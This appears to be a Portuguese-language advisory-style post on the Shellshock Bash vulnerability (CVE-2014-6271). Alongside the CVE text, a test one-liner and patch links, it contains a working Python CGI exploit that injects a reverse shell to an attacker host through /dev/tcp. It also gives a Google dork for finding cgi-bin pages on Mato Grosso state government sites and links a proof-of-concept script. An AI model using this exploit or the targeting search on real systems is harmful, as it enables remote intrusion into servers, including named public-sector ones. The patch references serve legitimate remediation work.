### GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.
### Quem já confirmou?
External Source: CONFIRM
Name: https://bugzilla.redhat.com/show_bug.cgi?id=1141597
Type: Patch Information
Hyperlink: https://bugzilla.redhat.com/show_bug.cgi?id=1141597
External Source: CONFIRM
Name: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
Hyperlink: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
### Testando a Vulnerabilidade:
root@sefaz:~ # env x='() { :;}; echo vulneravel' sh -c "echo isso eh um teste"
vulneravel
isso eh um teste
se a mensagem em negrito acima aparecer, a versão do bash esta vulnerável.
### Atacando a aplicação:
# #CVE-2014-6271 cgi-bin reverse shell # import httplib,urllib,sys if (len(sys.argv)<4): print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0] print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0] exit(0) conn = httplib.HTTPConnection(sys.argv[1]) reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3] headers = {"Content-type": "application/x-www-form-urlencoded", "test":reverse_shell } conn.request("GET",sys.argv[2],headers=headers) res = conn.getresponse() print res.status, res.reason data = res.read() print data
### Dork pesquisa google: inurl:cgi-bin/ ou filtrando mato grosso = inurl:cgi-bin site:.mt.gov.br :p
### POC Script: http://pastebin.com/kQ5ppEZD || https://github.com/rapid7/metasploit-framework/pull/3882
### patch de Correção:
http://ftp.gnu.org/pub/gnu/bash/bash-3.0-patches/bash30-017
http://ftp.gnu.org/pub/gnu/bash/bash-3.1-patches/bash31-018
http://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052
http://ftp.gnu.org/pub/gnu/bash/bash-4.0-patches/bash40-039
http://ftp.gnu.org/pub/gnu/bash/bash-4.1-patches/bash41-012
http://ftp.gnu.org/pub/gnu/bash/bash-4.2-patches/bash42-048
http://ftp.gnu.org/pub/gnu/bash/bash-4.3-patches/bash43-025
More Fontes:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
http://anchisesbr.blogspot.com.br/2014/09/seguranca-bashpocalypse.html
http://www.pcworld.com/article/2687857/bigger-than-heartbleed-shellshock-flaw-leaves-os-x-linux-more-open-to-attack.html
Happy Hacking (-;